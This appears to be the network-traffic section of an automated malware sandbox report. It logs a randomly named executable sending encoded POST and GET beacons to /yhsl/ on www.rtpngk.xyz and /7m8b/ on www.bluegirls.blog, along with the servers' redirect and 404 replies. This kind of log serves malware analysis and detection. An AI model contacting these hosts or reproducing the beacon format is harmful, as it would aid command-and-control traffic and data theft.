                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.749713188.114.97.3803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:41.729139090 CEST734OUTPOST /yhsl/ HTTP/1.1
                                Host: www.rtpngk.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.rtpngk.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.rtpngk.xyz/yhsl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 30 47 47 6d 2f 65 4c 51 73 75 69 58 64 46 5a 4e 47 45 4c 5a 6c 67 54 68 68 57 4f 38 70 37 39 6a 30 6c 53 6e 6b 57 63 4b 77 63 71 57 6e 77 67 6c 59 2b 72 74 76 45 41 59 43 7a 41 66 65 41 55 68 6c 2b 32 44 67 58 46 4e 67 4f 4f 5a 6d 70 45 55 77 68 31 6f 48 45 31 4e 48 78 4b 79 6c 64 75 54 6b 46 6f 6a 53 6d 6e 35 56 54 38 4d 43 6a 6c 47 2b 45 62 49 58 4a 74 31 62 58 62 39 68 4d 75 4c 58 6c 51 66 6c 68 6b 47 5a 6f 46 4b 76 6f 41 66 56 46 4c 49 6c 46 54 51 48 42 67 64 6c 46 6d 2b 71 6a 34 61 7a 6b 46 41 76 39 6c 6c 35 4b 76 39 64 44 30 52 44 45 78 62 71 51 44 47 37 5a 30 42 56 56 2b 72 36 45 6a 49 61 73 57 37 7a 6e 44 46 4d 51 3d 3d
                                Data Ascii: 76=0GGm/eLQsuiXdFZNGELZlgThhWO8p79j0lSnkWcKwcqWnwglY+rtvEAYCzAfeAUhl+2DgXFNgOOZmpEUwh1oHE1NHxKylduTkFojSmn5VT8MCjlG+EbIXJt1bXb9hMuLXlQflhkGZoFKvoAfVFLIlFTQHBgdlFm+qj4azkFAv9ll5Kv9dD0RDExbqQDG7Z0BVV+r6EjIasW7znDFMQ==
                                Sep 23, 2024 14:37:42.194437027 CEST814INHTTP/1.1 301 Moved Permanently
                                Date: Mon, 23 Sep 2024 12:37:42 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Mon, 23 Sep 2024 13:37:42 GMT
                                Location: https://www.rtpngk.xyz/yhsl/
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WbRBCIA4aL832PO5oYqpAo5pu8t%2B6LSgEqlnWP8QYrPTih5ox8MiuYNaRRtNoJ6AMm3X2jcoPx00ZAVy3f4Kv%2B%2Fai9MjnUNBClSfptdwtsAjK%2FU2RSqvwT25Ocr4mnvKmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                Server: cloudflare
                                CF-RAY: 8c7a966a4c48440d-EWR
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.749714188.114.97.3803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:44.726186991 CEST754OUTPOST /yhsl/ HTTP/1.1
                                Host: www.rtpngk.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.rtpngk.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.rtpngk.xyz/yhsl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 30 47 47 6d 2f 65 4c 51 73 75 69 58 64 6d 42 4e 41 6c 4c 5a 6a 41 54 69 69 57 4f 38 69 62 38 71 30 6c 4f 6e 6b 58 59 61 33 70 36 57 70 31 45 6c 4b 76 72 74 36 45 41 59 4a 54 42 55 42 51 55 71 6c 2b 4b 78 67 57 35 4e 67 4f 4b 5a 6d 73 67 55 77 57 68 76 46 55 31 44 50 52 4b 77 36 4e 75 54 6b 46 6f 6a 53 69 32 55 56 54 6b 4d 46 53 56 47 35 56 62 48 64 70 74 30 61 58 62 39 32 63 75 48 58 6c 51 68 6c 67 49 67 5a 71 39 4b 76 73 49 66 56 55 4c 4c 38 31 54 53 44 42 68 4f 73 33 50 48 74 43 49 61 32 46 42 55 33 36 34 42 31 63 79 66 48 68 34 39 64 56 4a 67 75 53 6e 77 73 2f 70 30 58 55 36 7a 33 6d 58 70 46 62 7a 52 2b 31 69 42 61 6a 57 43 2b 63 64 50 46 79 4c 6e 7a 2b 4f 74 67 47 33 38 4b 57 49 3d
                                Data Ascii: 76=0GGm/eLQsuiXdmBNAlLZjATiiWO8ib8q0lOnkXYa3p6Wp1ElKvrt6EAYJTBUBQUql+KxgW5NgOKZmsgUwWhvFU1DPRKw6NuTkFojSi2UVTkMFSVG5VbHdpt0aXb92cuHXlQhlgIgZq9KvsIfVULL81TSDBhOs3PHtCIa2FBU364B1cyfHh49dVJguSnws/p0XU6z3mXpFbzR+1iBajWC+cdPFyLnz+OtgG38KWI=
                                Sep 23, 2024 14:37:45.169430017 CEST820INHTTP/1.1 301 Moved Permanently
                                Date: Mon, 23 Sep 2024 12:37:45 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Mon, 23 Sep 2024 13:37:45 GMT
                                Location: https://www.rtpngk.xyz/yhsl/
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BS9hApzbD8MkVH1h6KOQjqYo4sKp1S8nuqUxcUR6O6yGh9yENwvEU4PqNNMe2h4%2Beobxlx%2B%2F675cTTK0%2Bofr0w%2FBjhABOy33l%2F%2FXWtUBxXBoJOmjx4mxY4jZuasTNQvI7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                Server: cloudflare
                                CF-RAY: 8c7a967cf87b423e-EWR
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.749715188.114.97.3803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:48.084470034 CEST1767OUTPOST /yhsl/ HTTP/1.1
                                Host: www.rtpngk.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.rtpngk.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.rtpngk.xyz/yhsl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 30 47 47 6d 2f 65 4c 51 73 75 69 58 64 6d 42 4e 41 6c 4c 5a 6a 41 54 69 69 57 4f 38 69 62 38 71 30 6c 4f 6e 6b 58 59 61 33 70 79 57 70 44 59 6c 59 63 7a 74 38 30 41 59 45 7a 41 54 42 51 55 33 6c 2b 69 31 67 57 30 79 67 4d 43 5a 6b 4b 38 55 32 6a 4e 76 50 55 31 44 44 78 4b 7a 6c 64 76 5a 6b 46 34 5a 53 6d 71 55 56 54 6b 4d 46 52 4e 47 76 55 62 48 53 4a 74 31 62 58 62 78 68 4d 75 72 58 6d 67 58 6c 67 38 57 5a 36 64 4b 73 4e 30 66 5a 47 54 4c 30 31 54 55 50 68 67 4a 73 33 54 6d 74 43 46 68 32 46 6c 2b 33 39 55 42 77 36 48 43 65 69 38 56 66 69 68 6e 75 53 48 47 75 70 68 75 50 69 47 4a 77 48 6e 49 4a 70 54 74 78 6d 75 2f 58 7a 66 55 6a 61 6c 5a 64 78 79 2b 37 70 54 34 79 47 54 62 5a 79 68 36 78 47 58 68 76 4f 59 63 30 58 6e 74 33 65 55 4a 4e 4a 7a 4a 32 77 66 6c 6b 30 72 57 37 68 35 41 54 38 4f 66 65 4c 38 42 39 73 35 69 4d 34 54 79 4b 2f 30 4e 7a 6e 70 67 51 53 37 66 47 57 6a 34 48 51 45 6f 48 42 51 2f 78 45 63 6c 4b 31 71 33 7a 6f 34 4d 45 30 68 6c 41 33 4f 4f 61 36 74 4e 53 32 64 38 7a 72 67 [TRUNCATED]
                                Data Ascii: 76=0GGm/eLQsuiXdmBNAlLZjATiiWO8ib8q0lOnkXYa3pyWpDYlYczt80AYEzATBQU3l+i1gW0ygMCZkK8U2jNvPU1DDxKzldvZkF4ZSmqUVTkMFRNGvUbHSJt1bXbxhMurXmgXlg8WZ6dKsN0fZGTL01TUPhgJs3TmtCFh2Fl+39UBw6HCei8VfihnuSHGuphuPiGJwHnIJpTtxmu/XzfUjalZdxy+7pT4yGTbZyh6xGXhvOYc0Xnt3eUJNJzJ2wflk0rW7h5AT8OfeL8B9s5iM4TyK/0NznpgQS7fGWj4HQEoHBQ/xEclK1q3zo4ME0hlA3OOa6tNS2d8zrgyCYjusk8FeYEYP4WqX7b9dgtYVEEwcyt0UmZhalZQpcy4yAE8d1AHqMIrnB2YP7luziuyAYAQ/3unCRT4MS1qV3nqqj6HHCFAnZ8yU/c3PqLrCt0ZAGHEzX1alYUqsn9buES0c5vUl/os3r8W5P6GuM5xo2jocUECvfgoz5lOuqYfaAx7l9GSzN5xbzvpfrspdBpiJUSWPc1DPZx48Q4X7jbhNbfKTq9W18u4kysQgJ4RmgTjLPP7PQGOWndOR1cA0cUgEEdXa5g1Bl7wCt4L5W73T2sr2a07atPRROTvntJg1x5HgDFdyAxozxVuWpYKWiF0sFmaFs6+7IX6pcx5RSusmShcBxxXslgapSAhlnr5n0OguVu7/VkqA2Iom83tGanTYCf5hZ7OSGjMrOojjWfonfghMx4vS+qWm5o/4Nu1oOSTrkccAAAUQxsnS3ayq8XHudkXfT4JvuGnLqHfqyov0Pibo7QQpfxzitP36UQ1/KYug7remqDn0HUoKwbe5tHFJ/sk3RJvNeSTmcYLUCu9h9Io2iSBRZoKKjzKE/v6rjOsTC8aGfkSv4ks8+RcA0PqtwB/Nk2VpuMAscdJpCVMZcUFunWz5N9JmSQ+b3KMa/2pWFID9v6RSXcFC3Jp5DsP4lNgR8YuxLn2Z1UIXZIfIknN+u4wR [TRUNCATED]
                                Sep 23, 2024 14:37:48.552010059 CEST808INHTTP/1.1 301 Moved Permanently
                                Date: Mon, 23 Sep 2024 12:37:48 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Mon, 23 Sep 2024 13:37:48 GMT
                                Location: https://www.rtpngk.xyz/yhsl/
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tObdvQuvgbak1KPlLHECgKLZIyN3OIqVva2%2Fvit93yqOIHSUEZ6p4VCbhMRFa4so4TRfspyZeKEAkmzUpzJ5FI2m2WPghnuwyyeudRScZxfv7KMKRRGZNUpZNAiMkgFzRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                Server: cloudflare
                                CF-RAY: 8c7a96921d972361-EWR
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.749716188.114.97.3803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:50.630011082 CEST475OUTGET /yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyo2Uxd0f+FrZwD+wtTCitgNQzIzPqlhTclUhz8bxA3FGZPimHZW40XTk/UgPnbZQA2uTwzCdxs&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.rtpngk.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:37:51.080991983 CEST992INHTTP/1.1 301 Moved Permanently
                                Date: Mon, 23 Sep 2024 12:37:51 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Mon, 23 Sep 2024 13:37:51 GMT
                                Location: https://www.rtpngk.xyz/yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyo2Uxd0f+FrZwD+wtTCitgNQzIzPqlhTclUhz8bxA3FGZPimHZW40XTk/UgPnbZQA2uTwzCdxs&mtJD_=fvdlJ2L
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eSAbk1p68gZhJkkCVintsdVG8UDCZiPLnBXBsBgv63D1tTKrCwPHZJFB9i3ITNIHri1QM2BbDqk1TFzX4wM92spc9PrW3N7yp9UVWfk%2Bo6hK3W%2FvoJG%2FBUgK1ckzqIro%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Speculation-Rules: "/cdn-cgi/speculation"
                                Server: cloudflare
                                CF-RAY: 8c7a96a1e903c32f-EWR
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.749717195.110.124.133803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:56.231558084 CEST746OUTPOST /7m8b/ HTTP/1.1
                                Host: www.bluegirls.blog
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bluegirls.blog
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.bluegirls.blog/7m8b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 65 57 42 50 76 71 31 6c 58 38 38 37 46 4e 55 4c 6d 72 37 73 35 73 30 42 68 32 52 2b 30 77 51 32 68 67 74 66 49 35 32 6d 67 63 4d 7a 43 4f 61 58 38 77 72 61 6b 35 4a 6a 64 6c 74 6e 6a 4e 55 44 4c 4f 6b 67 67 53 50 32 6f 45 6d 61 37 41 55 4d 45 41 78 36 74 78 34 4e 33 53 52 57 31 67 61 6e 6a 4f 65 6c 4d 68 48 68 69 6c 36 2f 6e 5a 77 70 37 34 79 61 41 58 74 41 73 2b 77 68 65 61 44 31 52 6f 69 76 41 46 43 67 30 2f 4a 71 58 46 2f 64 37 38 46 50 55 6d 31 6c 4c 59 30 73 47 52 53 53 36 70 44 57 34 46 64 7a 6d 6a 51 35 72 63 52 66 36 37 56 67 57 6a 4c 31 64 42 36 4e 45 5a 34 6a 68 54 52 37 65 32 52 2b 39 46 57 78 61 38 46 47 6b 77 3d 3d
                                Data Ascii: 76=eWBPvq1lX887FNULmr7s5s0Bh2R+0wQ2hgtfI52mgcMzCOaX8wrak5JjdltnjNUDLOkggSP2oEma7AUMEAx6tx4N3SRW1ganjOelMhHhil6/nZwp74yaAXtAs+wheaD1RoivAFCg0/JqXF/d78FPUm1lLY0sGRSS6pDW4FdzmjQ5rcRf67VgWjL1dB6NEZ4jhTR7e2R+9FWxa8FGkw==
                                Sep 23, 2024 14:37:56.855519056 CEST367INHTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:37:56 GMT
                                Server: Apache
                                Content-Length: 203
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 6d 38 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /7m8b/ was not found on this server.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                14192.168.2.749718195.110.124.133803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:58.783951044 CEST766OUTPOST /7m8b/ HTTP/1.1
                                Host: www.bluegirls.blog
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bluegirls.blog
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.bluegirls.blog/7m8b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 65 57 42 50 76 71 31 6c 58 38 38 37 47 73 45 4c 72 71 37 73 6f 38 30 47 75 57 52 2b 37 51 51 79 68 6e 6c 66 49 34 79 32 67 75 34 7a 42 75 71 58 39 78 72 61 6c 35 4a 6a 56 46 74 69 6e 4e 56 50 4c 4f 6f 57 67 58 76 32 6f 45 79 61 37 46 6f 4d 46 7a 5a 39 69 42 34 50 2b 79 52 59 34 41 61 6e 6a 4f 65 6c 4d 68 54 48 69 6c 79 2f 6e 49 41 70 39 64 47 62 4e 33 74 44 72 2b 77 68 61 61 44 35 52 6f 6a 4d 41 41 72 33 30 38 78 71 58 48 6e 64 34 74 46 4d 50 57 31 5a 55 6f 30 37 47 54 37 73 33 61 2f 64 78 44 52 52 75 78 4d 71 71 71 4d 39 67 5a 5a 4d 49 79 7a 4f 5a 44 65 37 54 2f 6c 57 6a 53 56 6a 54 55 6c 66 69 79 7a 62 58 75 6b 43 79 48 36 56 75 39 74 6f 70 35 44 52 77 4b 41 58 43 6b 6a 54 55 33 55 3d
                                Data Ascii: 76=eWBPvq1lX887GsELrq7so80GuWR+7QQyhnlfI4y2gu4zBuqX9xral5JjVFtinNVPLOoWgXv2oEya7FoMFzZ9iB4P+yRY4AanjOelMhTHily/nIAp9dGbN3tDr+whaaD5RojMAAr308xqXHnd4tFMPW1ZUo07GT7s3a/dxDRRuxMqqqM9gZZMIyzOZDe7T/lWjSVjTUlfiyzbXukCyH6Vu9top5DRwKAXCkjTU3U=
                                Sep 23, 2024 14:37:59.468683004 CEST367INHTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:37:59 GMT
                                Server: Apache
                                Content-Length: 203
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 6d 38 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /7m8b/ was not found on this server.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                15192.168.2.749719195.110.124.133803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:01.333888054 CEST1779OUTPOST /7m8b/ HTTP/1.1
                                Host: www.bluegirls.blog
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bluegirls.blog
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.bluegirls.blog/7m8b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 65 57 42 50 76 71 31 6c 58 38 38 37 47 73 45 4c 72 71 37 73 6f 38 30 47 75 57 52 2b 37 51 51 79 68 6e 6c 66 49 34 79 32 67 75 67 7a 43 64 69 58 2f 53 44 61 33 4a 4a 6a 66 6c 74 6a 6e 4e 56 43 4c 4e 59 4b 67 58 79 44 6f 47 4b 61 37 6e 51 4d 4d 69 5a 39 31 78 34 50 68 69 52 5a 31 67 61 58 6a 4f 75 68 4d 68 44 48 69 6c 79 2f 6e 4c 59 70 36 49 79 62 50 33 74 41 73 2b 77 6c 65 61 43 75 52 73 50 79 41 41 6d 4b 68 63 52 71 57 6e 33 64 39 66 74 4d 53 6d 31 68 58 6f 31 2b 47 54 6e 4a 33 61 53 6b 78 44 4e 72 75 78 30 71 6e 65 78 65 34 49 56 68 61 69 33 7a 47 53 57 42 54 4f 59 6c 6d 78 52 59 4e 33 4e 44 68 43 50 55 63 4e 67 2f 35 68 7a 50 38 75 4e 71 76 70 7a 44 30 65 52 65 58 32 7a 73 43 43 41 70 70 75 68 73 54 44 47 63 6a 5a 6a 66 74 43 75 74 71 45 76 6d 48 49 4e 73 2f 4f 54 30 5a 5a 54 44 67 64 4d 4c 2f 70 37 59 69 67 67 70 4e 76 73 30 57 39 62 77 68 51 38 4c 50 49 36 35 6e 48 6d 38 75 32 64 34 58 65 43 4a 2f 57 41 34 47 56 62 71 2f 6f 47 2f 47 69 69 32 34 41 54 41 54 52 67 6c 33 6e 6f 5a 55 32 6e [TRUNCATED]
